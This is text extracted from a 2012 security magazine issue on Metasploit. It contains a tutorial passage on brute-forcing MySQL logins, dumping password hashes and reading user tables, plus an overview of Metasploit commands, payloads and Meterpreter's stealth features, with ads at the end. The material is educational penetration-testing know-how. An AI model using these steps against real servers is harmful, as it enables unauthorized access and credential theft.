Now, you might be thinking, ‘Ok, lets Google for exploit for the MySQL version and pwn this box!!’ No, I suggest one step before that. Try running a script that checks if the server is using default username-password combinations. A lot of server administrators forget to put passwords on default accounts and that just makes our job easier. So, I’m going to run a scan for that. This is a kind of brute-force against the MySQL server. What you are basically doing is brute-forcing the logins. Luck-ily, MSF offers a module for that! This module is called mysql_login. You can use this module by run-ning the command use auxiliary/scanner/mysql/

mysql_login. The mysql_login module can be used in conju-

gation with your word-lists in order to discover at least one valid database account. This checks the MySQL database for weak credentials and is a good practice. There are three variables that you need to set – RHOST, USER_FILE and PASS_FILE. USER_FILE con-tains possible usernames. PASS_FILE contains a list

Figure 35. Running the mysql_login module

Figure 36. Configuring the mysql_enum module

Figure 34. Setting the variables and running

mEtasploit

thE Exploit magazinE august 201224

of passwords. These two files can be text files (.txt) or list files (.lst), with full path as shown: Figure 34.

You can run the module with the run command as shown above. After looking at the output of the scanner, you will see that the scanner has been suc-cessful (unless of course, you have added strong passwords to the guest and root accounts. This is a demonstration, hence, I’ll not be going into the pro-cess of bruteforcing username and password com-binations.

After running the module, you should see output like in the following Figure 35.

Before connecting to the MySQL server directly using the login information, we can use two oth-er MSF modules to enumerate the database and dump credential information. The two modules that we will be using are mysql_enum and mysql_hashdump.

This, can be done manually, but well, I think know-ing that a automation module for this process ex-ists, we would tend to do it the easy way round. Mysql_enum is used to find information about the

various database accounts on the remote MySQL server. But we will need to configure three variables

Figure 37.

Figure 40.

Figure 39. Connecting to the target MySQL Server using the discovered credentials

Figure 38. Configuring and running the mysql_hashdump module

mEtasploit

thE Exploit magazinE august 2012 25

to do so – RHOST, USERNAME and PASSWORD. But since the password to the root account is blank, we do not need to set the PASSWORD variable. After configuring the module, you can run it with the run command (Figure 36).

Sample output of the following command is: Fig-ure 37

Now, it is time to configure the mysql_hashdump mod-ule to dump the password hashes belonging to the various database user accounts. Again, the same variables need to be set as the previous module. After configuring the module, you can run it using the run command, as follows: Figure 38.

After this process is complete, we can make a di-rect connection to the target MySQL server using a mysql client. Since the attacker box is running BackTrack 5, the mysql client is pre-installed. You can run it with the following syntax – mysql -h <IP> -u <username> -p <password>. Replace the required parts of the command and run it. This is how it looks after the connection is established (Figure 39).

Now that the mysql connection has been estab-lished, you can run various commands to hit the jackpot! You can use the show databases; command to display a list of databases on the server. You might get something like this: Figure 40.

Now, let me assume that you might be interest-ed in the database called ‘mysql.’ You can now use

the mysql database using the command use mysql. It will show you a message which acknowledges that the database has been changed. After that, you can run the command show tables; to list the ta-bles on the current database (in this case – mysql) (Figure 41).

Now, the most interesting table here is the one called user. If user has two columns called user-name and password, then you can extract the da-ta from the table user using the command select username, password from user; On running that com-mand, you should see something similar to the out-put shown in the Figure 42.

We can now see that there are three users with no password. You may now decide that you want to

Figure 41. Tables in the database named ‚mysql’

Figure 42. Data in table ‚user’

mEtasploit

thE Exploit magazinE august 201226

see the tables in the database ‘owasp10.’ You can do that by running the command show tables from owasp10;.

Now, you’ll see the tables present in the owasp10 database. You might see something like this: Fig-ure 43.

You can go on like this till you find the information that you are hired to find. Remember, these tables were created well in advance for the sake of dem-onstration of various commands for this tutorial. You will not find all of these tables in your installation un-less you create them before you launch this attack.

The methods described here, are solely for teach-ing you the various techniques that may be used for exploiting machines using MSF. It is to show how useful MSF is, in real-world scenarios. In the be-ginning of this issue, I have pointed out that MSF makes it very easy for us to configure and deploy exploits.

I have shown you how simple it is to use the msf-console, which is the CLI for the Metasploit Frame-work. Configuring exploits was really easy. I sug-gest you all, to try as many exploitations as you can legally.

Do not use these techniques to do anything ille-gal, that is not the purpose of these tutorials. These articles and instructions are mainly to break the ice, and introduce you to the most common and sim-plest of exploitation frameworks out there.

I would like you all to try your attacks either on war-gaming server, or better, on your virtual ma-chines, using the Metasploitable VMWare Image. You can find out more by following this link – http://www.offensive-security.com/metasploit-unleashed/Metasploitable.

I have only demonstrated a few of the existing MSF scripts which may be used in various attacks. They are extremely helpful (but sometimes fail, as we have seen, when we tried to kill our AV). I suggest reading about the rest of the MSF scripts from here – http://www.offensive-security.com/metasploit-unleashed/Existing_Scripts.

The best place to learn more about the Metasploit Framework, is the official website of Metasploit. It goes through everything from the basics to the more advanced techniques. I would like all of you to read up from here – http://www.offensive-security.com/metasploit-unleashed/Main_Page.

There are many parts of the Metasploit Frame-work that are not really in the scope of this issue, I may cover it in future issues if the editorial board of Hakin9 permit. Armitage, SET (Social Engineering Tookit) and Fast-Track are some important things you can read about.

If you need a complete MSF Module reference, you can find one online, on the official Offensive-Security website – http://www.offensive-security.com/metasploit-unleashed/Module_Reference. Why read from some other source, when the cre-ators themselves put it up, in a neat way. This link is definitely a must-read for everybody.

A lot of Exploits may not be directly included into Metasploit. MSF offers the flexibility of writing your own exploits and modules and including them into the Framework. But another place, where there are up-to-date public exploits, as a search-able data-base is http://www.exploit-db.com/. You can also go through some of the papers there, a lot of very well written stuff.

After going through this issue, you might just feel like writing exploits yourself. There are very few places on the internet that actually offer tutori-als for this. The best place that gives you an idea on exploit-writing, from the very basic stack based overflows, to the more advanced exploits is – http://corelan.be/.

Well, I think I’ve covered most of what I wanted to. I’d like to thank the Hakin9 team for giving me this opportunity to write for this issue. I’m very glad and extremely grateful. I hope they give me such oppor-tunities in the future as well.

Cheers!

Figure 43. Tables in the database called ‚owasp10’

ABHINAV DASwww.abhinavdas.in@theabhinavdas

If our FREE antivirus for home outperforms competitors' end-point products,imagine what our business solutions can do for you.

�e most popular antivirus in the world.www.avast.com/best-antivirus

mEtasploit

thE Exploit magazinE august 201228

MSF initially started as a collection of ex-ploits, but as the technology advanced it began to grow in size as well as func-tionality. Currently it provides capabilities

for the design and development of reconnaissance,

exploitation and post-exploitation security tools. It ranks second on SecTools.Org: Top 125 Network Security Tools (Source: Sectools.org).

Metasploit was basically developed by HD Moore in 2003 as a network tool. Initially it was created

Metasploit: Part-I

When it comes to penetration testing and a single tool is required to own all the boxes, Metasploit Framework is the one stop shop. Metasploit Framework or better known as MSF is an advanced open-source tool written in ruby which provides security researchers and pentesters a framework to develop and launch exploits, payloads, encoders, exploration and other different security testing tools.

by Sudhanshu Chauhan

Figure 1. Metasploit Console

mEtasploit

thE Exploit magazinE august 2012 29

using scripting language Perl but later on, it was completely rewritten in the Ruby programming lan-guage. Today it is one of the largest Ruby project with more the 700,000 lines of code. Metasploit project had been acquired by Rapid7, a company that provides security risk intelligence solutions on October 21, 2009. Figure 1 shows a screenshot of the Metasploit console.

Some of the terms used above (and further in the article) are clarified as below:

ExploitA piece of software, a data chunk, or command se-quence that takes advantage of a bug, vulnerability or bad configuration in order to cause unintended or unanticipated behavior to occur on computer soft-ware or hardware.

PayloadThe essential data that is being carried within a packet or other transmission unit. It is basically the code that will be executed on the target system up-on successful exploitation.

EncodersWays to twist the code such that anti-malware ap-plications/IDS/IPS won’t detect the payload.

The basic exploitation steps using the Framework are:

• Choosing and configuring an exploit;• Validate whether the chosen system is suscepti-

ble to the chosen exploit (optional); • Choosing and configuring a payload;• Choosing the encoding technique to encode the

payload;• Executing the exploit. Figure 2 displays the ex-

ploitation process through an example of suc-cessful Windows 7 machine exploitation.

One of the major advantages of the MSF is the modularity of allowing combining any exploit with any payload. It assists the tasks of all the attack-ers, the exploit writers, and the payload writers and hence has become the tool of choice for anybody related to information security (or insecurity).

To initialize the process of exploitation, some in-formation is required about the target system (like OS/Browser version). This information can be col-lected via techniques like port scanning, OS finger-printing, banner grabbing etc. Some of the best tools of trade for these implement techniques are nmap (net-work mapper); Nessus (Vulnerability scanners) etc.

Based on this information the exploit and payload are chosen and the exploitation process advanc-es. Metasploit has the ability to import vulnerability scan records and match the identified vulnerabili-ties to existing exploit modules for accurate exploi-tation and this ability is what makes MSF one of the

Figure 2. Exploitation Example

mEtasploit

thE Exploit magazinE august 201230

best exploitation frameworks with periodic function-ality updates.

MSF EnvironmentsMetasploit framework has four work environments, msfconsole, msfcli, msfweb and msfgui interface (newly introduced) each with their own strengths and weaknesses. All these interfaces are explained below:

MsfconsoleThe msfconsole is the traditional and primary means of using the MSF. It provides a centralized console and allows efficient access to virtually all of the options available in Metasploit framework. After installation, the console can be simply launched by typing the command ./msfconsole. Figure 3 shows msfconsole interface.

Pros and Cons:

• It is the most well supported way to access all (almost) the features within Metasploit.

• It is the most stable MSF interface.• Full readline support, tabbing and command

completion available.• External command execution is possible. • Not as point and click as msfgui/msfweb.

MsfcliThe msfcli interface allows for exploits to be execut-ed from the UNIX or Windows command line with-out the need to first launch the msfconsole inter-face.

This is best suited for quickly launching an ex-ploit by directly specifying the required parameters as command-line arguments. But it can handle only one shell at a time, which makes it quite impractical for client-side attacks. Figure 4 shows msfcli inter-face.

Pros and Cons:

• It’s easy to use and hence good for learning.• Ideal for use in scripts and simple automation.• Only one shell can be handled at a time.• Not as well supported as msfconsole.

MsfwebThe Msfweb provides the user with a browser based interface to access and launch exploits, but is not a recommended interface as it is not very stable and not being actively developed.

It’s good for demonstration purpose only. Figure 5 shows msfweb.

Pros and Cons:

Figure 3. msfconsole

Figure 4. msfcli

mEtasploit

thE Exploit magazinE august 2012 31

• It provides a pretty to-use interface.• Good for the demonstration of the exploitation

to the management/layman.• Not as well supported as msfconsole.• Slower and less stable.

MsfguiA new GUI for Metasploit has been added to the Metasploit SVN Repository in 2010, which provides

the functionality of msfconsole in addition to many new features. This new GUI is multi-platform and it is based on Java. It provides a better interface than Msfweb and is more stable. Figure 6 shows msfgui.

Pros and Cons:

• Provides a very stable GUI.• Easy to implement and use.• Requires comparatively more memory.

Figure 6. msfgui

Figure 5. msfweb

mEtasploit

thE Exploit magazinE august 201232

MSF Basic CommandsBefore using MSF for exploit development and/or pentesting it would be useful to learn some basic commands and their functionality. Below is a set of most frequently used commands.

• help: The 'help' command does what its name suggests, it gives basic information of all the commands.

• search <keyword here>: Inputting the command ‘search’ along with the keyword lists out the var-ious possible exploits, payloads that have that keyword pattern in them.

• show exploits: The command 'show exploits' lists out the currently available exploits.

• show payloads: Using the same 'show' command, we can also list the payloads available.

• show options: Typing in the command 'show op-tions' will show options that have been set. Each exploit and payload comes along with its own options that can be set.

• info <type> <name>: To search for specific infor-mation on an exploit or payload, use the 'info' command.

• use <exploit name>: Inserting this command tells Metasploit to use the exploit with the specified name provided.

• set RHOST <hostname/ip>: This command is used to instruct Metasploit to target the specified re-mote host.

• set RPORT <host port>: This command sets the port that Metasploit will connect to on the re-mote host.

• set PAYLOAD <payload name>: This command sets the payload that is to be used and will provide a shell when a service has been exploited.

• set LPORT <local port>: This command sets the port number that the payload will open on the server machine when a service is exploited. One thing to note here is that the provided port number should not be reserved or already in use on the machine.

• exploit: Actually launch the exploit code on the service to be exploited.

• sessions –l: Displays and controls sessions be-tween the user and targeted hosts.

• sessions -i <ID>: Various sessions on the ex-ploited systems can be accessed using this command, where ID is specifies the session to be interacted with.

• Anything that can run from the command line.

Some of these commands are demonstrated in Figure 2.

MSF Exploit typesMSF Exploits can be divided into two categories namely active and passive based on the way they operate.

Figure 7. Meterpreter

mEtasploit

thE Exploit magazinE august 2012 33

Active exploitAn active exploit will execute till its completion and exploit a specific host machine and finally will ex-it. Brute-force modules will exit when a shell opens from the victim. In case an error is encountered the module execution will stop. An active module can be forced to the background by passing –j to the exploit command.

Passive exploitA passive exploit holds and waits for an incoming host and exploits them as they connect. These ex-ploits mostly focus on clients (web browsers, FTP clients, etc.), i.e. intervention from the victim user’s side. Passive exploits report shells as they hap-pen and can be enumerated by passing sessions –l which displays and controls sessions between the user and targeted hosts. Sessions on the exploited systems can be accessed using sessions -i com-mand, along with the session ID.

MSF payload typesMSF provides three different payload modules: Sin-gles, Stagers and Stages. Each payload provides different functionality and is suitable for different scenario.

SinglesThey are self-contained payloads which does a specific task. E.g. windows/adduser.

StagersStagers create a network connection between at-tacker and victim, it is required as singles cannot deliver arbitrarily large payload at one shot (de-pending upon exploit). E.g. windows/shell/bind_tcp (Bind TCP Stager).

StagesStages are payload components that are down-loaded by stagers and executed. They typically do complex tasks like VNC, Meterpreter etc. E.g. win-dows/shell/bind_tcp (Windows Command Shell).

MeterpreterExplanation of the Metasploit payloads cannot be complete without an explanation of Meterpreter, an advanced payload included in MSF. The way to look at the Meterpreter is not simply as a payload, but slightly as an exploit platform that is executed on the remote system.

Meterpreter is short for Meta-Interpreter which is a multi-faceted, dynamically extensible payload that uses in-memory DLL injection and is runtime exten-sible over the network. DLL injection is a technique used to execute code inside the address space of a different process by forcing it to load a dynamic-link library. The striking features which make Meter-preter stand out from other payloads are as follow:

• It does not create a new process.• It does work in chroot’d environments.• It does allow for robust extensibility.

Meterpreter and all of the extensions that it loads are executed completely from memory and nev-er touch the target’s disk, thus leave no trace on the hard disk which allows them to execute under the radar of standard Anti-Virus detection/Forensic techniques. Scripts and plugins can be loaded, ex-ecuted and unloaded dynamically as and when re-quired. Figure 7 demonstrates a Meterpreter core command list.

Meterpreter is designed in such a manner that it can work on various different platforms, provided that there is a means by which shared objects can be loaded from memory.

This makes it possible to have a single meterpret-er client that is capable of running modules which are designed and developed to compile on a variety of platforms and architectures. Meterpreter can be considered as a typical command interpreter which has a command line and a set of commands that can be executed. The functionality it provides is that the meterpreter client can control the set of com-mands by injecting new extensions at runtime. As the extensions can potentially be applicable across platforms and architectures, so the meterpreter cli-ent can use the same client interface (and com-mand set) to control the extensions regardless. It communicates over the stager socket and offers a wide-ranging client-side Ruby API. Metasploit has a full-featured Ruby client API.

How it works (source: http://www.offensive-secu-rity.com/metasploit-unleashed).

• The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.

• The stager loads the DLL prefixed with Reflec-tive. The Reflective stub handles the loading/in-jection of the DLL.

• The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client.

• Lastly, Meterpreter loads extensions. It will al-ways load stdapi and will load priv if the mod-ule gives administrative rights. All of these ex-tensions are loaded over TLS/1.0 using a TLV protocol.

Meterpreter Design Goals StealthyStealth is one of the most important goals of a pen-tester during exploitation. Meterpreter provides this feature by completely residing in memory and not touching the disk, hence leaving no trace behind for forensic analysis. Meterpreter injects itself into the

mEtasploit

thE Exploit magazinE august 201234

compromised process and creates no new process-es. It can also migrate to other running processes easily. By default, Meterpreter uses encrypted com-munications which makes it even stealthier.

PowerfulMeterpreter utilizes a channelized communication system and provides some powerful features like upload/download files, retrieve password’s hash, scripts to automate common post exploitation tasks.

ExtensibleFeatures can be injected on the fly and are loaded over the network. New features can be added to Meterpreter without rebuilding it. This can be done by loading extensions. The client can upload the DLL over the socket which will be loaded in-mem-ory by the server running on the victim and initial-ized. The new extension will register itself with the server. The client on the attacker’s machine loads the local extension API and can call the extensions functions.

Command Reference (source: http://dev.metasploit.com/documents/meterpreter.pdf).

Some common commands provided by Meter-preter

• use: The use command is used to load meter-preter extensions. These extensions typical-ly provide more advanced commands and fea-tures to both the client and the server.

• read: This command reads data that has be out-putted by the remote server’s side of the chan-nel. A maximum amount of data to read can op-tionally be specified as the length parameter.

• write: This command writes an arbitrary amount of data to the input handler on the remote serv-er’s end of the channel. This is a non-interac-tive method by which data can be sent to the remote server’s end of the channel. Once the command is issued data can be typed on the client’s side until complete. Once complete, a ‘.’ should be issued on an empty line, thus sym-bolizing the end of the input.

• close: This command closes a channel and frees its resources. After a channel is closed it cannot be read from, written to, or interacted with. Most channels close automatically.

• interact: This command starts an interactive session with the channel specified in channel id. To terminate the interactive session a Ctrl-C must be issued. A prompt will be given asking whether or not the interactive session should re-ally be terminated.

• initcrypt: This command provides the client with the ability to enable an arbitrary cipher which will as a result encrypt the Value field of all the packets sent between the client and

the server excluding those which are explicit-ly PLAIN. The only supported cipher at the time of this writing is XOR but the framework existing for adding custom ciphers.

• upload: This command allows the client to up-load files the local machine to the remote serv-er. The command allows for specifying one or more files that are local to the client machine and are to be uploaded to the directory speci-fied in dst on the remote server.

• download: This command allows the client to download files from the remote server to the local client’s machine. The command allows for specifying one or more files that are to be downloaded to the directory specified in dst.

• portfwd: This command is an advanced means by which TCP connections can be tunneled through the connection between the client and the server to hosts on the server’s network. This allows the client to access hosts on the server’s network which may not otherwise be directly accessible. It is also useful for chaining exploits.

• execute: This command is used to execute an application on the remote server, optional-ly channelizing the input and output. When the input and output is channelized by using the -c parameter, it is possible for the client to read, write, and interact with the executable on the server.

• kill: This command provide a means by which processes on the remote server can be termi-nated.

• getuid: Provides the username that is associat-ed with the currently logged in user for the pro-cess.

• sysinfo: Provides information about the target host such as computer’s name and its OS ver-sion string.

ConclusionThis article provided a high-level introduction to Metasploit Framework and its usage. Metasploit is not just an exploitation framework but it also pro-vides some great post-exploitation and security testing features which certainly takes pentesting to the next level. Meterpreter’s ability of in-memory li-brary injection makes it the ideal vector for stealth. With meterpreter’s complete integration into the Metasploit Framework it can be easily used with future exploits. With very strong and constantly evolving Metasploit development it is hoped that new and existing modules will be developed and extended to make Metasploit framework a more powerful tool.

Reference Website: http://www.offensive-securi-ty.com/metasploit-unleashed/.

GEEK 411 | UAT STUDENT LIFE MAGAZINE | 1

THEY SELDOM SMILE AT THE NSA. CAN YOU MAKE THEM GRIN?

Prepare to Defend!www.uat.edu

877.828.4335

Learn how to synthesize and apply these vital skills and leadership ability to succeed in the fast moving field of Network Security.

Program accreditations, affiliations and certifications:

UAT has been designated as a Center for Academic Excellence in Information Systems Security Education by the US National Security Agency

One of the most prestigious Network Security programs

in the country

UAT’s coveted Bachelor of Science degree in Network Security is a vital national resource

We will teach you the concepts of security by design, and layered security to protect against exploitation of networks and data

CLUSTERGEEK WITH CAUTION!LEARN, EXPERIENCE AND INNOVATE WITH THE FOLLOWING DEGREE STUDENTS: Advancing Computer Science, Artificial Life Programming, Digital Media, Digital Video, Enterprise Software Development, Game Art and Animation, Game Design, Game Programming, Human-Computer Interaction, Open Source Technologies, Robotics and Embedded Systems, Serious Game and Simulation, Strategic Technology Development, Technology Product Design, Technology Studies, Virtual Modeling and Design, Web and Social Media Technologies

Bachelor of ScienceNetwork Engineering Network SecurityTechnology Forensics

Master of ScienceInformation Assurance

GEEK 411 AD

SYSTEMS SECURITY FOR THE 21st CENTURY

PLEASE SEE WWW.UAT.EDU/FASTFACTS FOR THE LATEST INFORMATION ABOUT DEGREE PROGRAM PERFORMANCE, PLACEMENT AND COSTS.

The Industry’s First Commercial Pentesting Drop Box.

F E A T U R E S :

J Covert tunneling J SSH access over 3G/GSM cell networks J NAC/802.1x bypass J and more!

t) @pwnieexpress e) info@pwnieexpress.com p) 802.227.2PWN

Air Freshener?

Printer PSU?...nope

Pw

n P

lug

.

Discover the glory of Universal Plug & Pwn

@ pwnieexpress.com

pwnplug - Dave-ad3-203x293mm.indd 1 1/5/12 3:32 PM